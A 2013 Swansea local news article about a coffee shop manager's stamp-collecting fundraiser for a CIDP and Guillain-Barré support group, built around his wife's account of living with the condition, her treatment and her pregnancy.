A coffee shop manager whose wife suffers from an extremely rare disorder has launched a fund-raising campaign to help victims of the debilitating condition.

Dan James, who runs Costa Coffee in the WH Smith store at the Quadrant shopping centre, in Swansea, is enlisting the help of customers.

His wife, Susan, 27, is one of just 600 people in the UK with Chronic Inflammatory Demyelinating Polyneuropathy (CIDP), in which the victims’ nerves attack themselves.

As part of Dan’s fund-raising efforts, Costa customers can drop off used stamps while waiting for their cappuccino or latte.

The stamps will then be sent to the CIDP support group to sell to collectors.

In CIDP the sufferer’s immune system attacks the outer insulating nerve layer, leading to weakness and altered sensations, which come on slowly, often over a few months. The weakness can be so severe as to confine patients to bed.

The condition left Sarah having to use a wheelchair because she couldn’t walk more than a short distance, unable to raise her arms or lift anything.

Now she’s just completed a trial of a new way to keep the condition at bay, and that may mean the end of lengthy hospital stays every few weeks.

Mum-of-one Sarah said: “Saving stamps is such an easy thing to do, so I was delighted when Costa agreed Dan could put a collecting box on the counter in the Quadrant Centre.

“The group sells them on to stamp collectors and it all helps with the funds. This Costa is next door to the Post Office as well, so we’re hoping people will have lots of unusual stamps they can give us.”

The Ancient and Medieval History Swansea university  graduate was diagnosed in June 2010, after she went to see a doctor because she had fallen downstairs three times in one week.

“Because the outside of my nerves had been eaten away, the messages from my brain were not being sent properly. My brain couldn’t tell my foot where it needed to be so I fell. I wasn’t hurt, just bruised, but I found it hard to get up again. My feet felt numb, a bit like when your foot goes dead because you’ve sat on it.

“Falling is par for the course with CIDP. You become more clumsy and unfortunately fall on a regular basis.

“Luckily I’ve now got so used to falling that I rarely hurt myself. You also become used to dropping things as your hands spontaneously open or don’t grip properly.

“Also, I realised I was taking longer and longer to walk to work. I was 24 and pretty fit – although I’m only 5ft 1in tall I’ve always been strong.

“I could lift my husband up, or move wardrobes. But suddenly I felt weak all the time, and not able to do anything, and had to hold on to the bannister to walk upstairs.

“I was like a 70-year-old. If I’d challenged my grandma to a race, she’d win! It seemed like I was walking through concrete, and couldn’t get my legs to move properly.”

The medic – her old university doctor – initially suspected Guillan-Barré syndrome (GBS), an acute form of CIDP, and referred her to a specialist at Morriston Hospital.

“A lot of doctors haven’t heard of the condition, but I was lucky in that my GP had,” said Sarah.

“At Morriston I had tests and an electromyogram, where they put electricity through the nerves to see if they are working properly. Then I had a lumbar puncture and it was confirmed that I had CIDP.”

She went on to a course of intravenous immunoglobulin (IVIG) – where antibodies from donor blood are injected into her – and soon rallied during her nine-day stay

“The doctor wouldn’t let me out of Morriston until I could get up from a squat. I hadn’t realised it, but before it was diagnosed, I was walking like a duck, waddling along because of my hips: the brain was sending the wrong messages so the hips moved too much, and my legs were trying to compensate,” explained Sarah.

“The number of people diagnosed with CIDP is 1 in 100,000 worldwide. There’s between 600 and 700 of us in the UK. The support group also helps those with GBS, which affects about 1,500 people a year in the UK.

“That condition comes on over a matter of days and can quickly lead to paralysis for months or even death.

“CIDP comes on more slowly and although you may die with it, you won’t die of it. However, once you’ve had GBS you are unlikely to relapse. The course of CIDP is generally relapsing/remitting and it’s not something that many people really recover from completely.”

Then weeks after she was diagnosed, she discovered she was pregnant, and she and fiancé Dan moved their wedding forward, and married in Swansea in October 2010.

“The pregnancy wasn’t planned – we hadn’t even had answers from the specialists about what CIDP meant for our chances of being parents, when I discovered I was expecting. For some people with CIDP makes the condition worse. I’m not sure what difference it made to me, because I was only just getting used to the condition.

“I had to go into hospital every few weeks for more IVIG treatment, and was meant to have one just before the baby was due. But he decided to come early and so I wasn’t able to have the last dose, which made me very bad after the birth.”

Michael was born by Caesarean section in February 2011, weighing 5lb 9oz – although he was healthy and could go home, Sarah was too ill to even lift him and the pair had to stay in hospital.

“It wasn’t great with the Caesarean – CIDP means you take a lot longer than average to get over anything that relaxes your muscles, so it took me a long time to get over the anaesthetic they used in the operation,” said Sarah.

“While I was well through the pregnancy, I was checked constantly by doctors because of my CIDP and had twice as many scans as in a normal pregnancy.

“One of the massive problems I had after the birth was that, because of the C-Section I obviously couldn’t use my stomach muscles until they healed.

“I hadn’t realised until then how much I used those to compensate for my inability to move in certain ways.”

Ian Kirkpatrick, Manager of the Quadrant Shopping Centre, said: “Just because a condition is little known doesn’t mean it can’t have awful effects on people’s lives and especially because it is so rare it is harder to find support.

“That makes what Dan and Sarah are doing to help even more important and hopefully it will be a way for people to make good use of their old stamps – so many people come to the Quadrant it is the ideal place for something like this.”

The couple, who met when they both worked at Swansea’s Vue Cinema, moved into a house in Llanelli, which they adapted so she didn’t have to use the stairs with new-born Michael.

“Also, there are no hills, so I can walk easily to the shops. I was fit and healthy before – I didn’t go to the gym or play sports but I walked everywhere. It’s difficult not being able to do that now, especially having to push a pram as well,” added Sarah.

She previously had to go to hospital every eight weeks for IVIG treatment, but last November was asked to take part in a steroids trial by her neurologist at Morriston Hospital.

“It involves high doses of steroids for four days out of every 28, for six months. The aim is to kick-start your immune system into working properly. I’ve just finished it and it’s hard to say yet whether I feel better or worse – it could be months before I start to feel ill again., or just a matter of weeks.

“It has made a difference, though – with IVIG you need to be on a downhill slope before they dose you. When I was on that I’d have to struggle looking after a child I could barely lift, while unable to walk properly, until they could get me in for treatment.

“I couldn’t lift Michael when he was born as he was too heavy for me.  Also it makes you tired – all the treatments have pretty nasty side effects too.

“The support group has been invaluable. When you are diagnosed with GBS or CIDP it is hard to take all the information in, as you are in shock. The support group is there to provide the information as and when you need it.

“They also offer practical support – it is useful to talk to somebody else with the condition to see how they are coping.

“They can provide grants for home improvements for sufferers and even give money to relations to help them to fund hospital visits for people (usually GBS sufferers) who are confined to hospital for long periods.  They also arrange conventions with neurologists so they can share information about the condition.

“The condition is usually thought to affect older men, but through the group I have discovered that there are younger people with it, and we stay in touch through our Facebook page. It’s not genetic, but it is linked to conditions that affect the immune system.”

More details about the support group at www.gbs.org.uk

Tuesday June 25th, 2013

News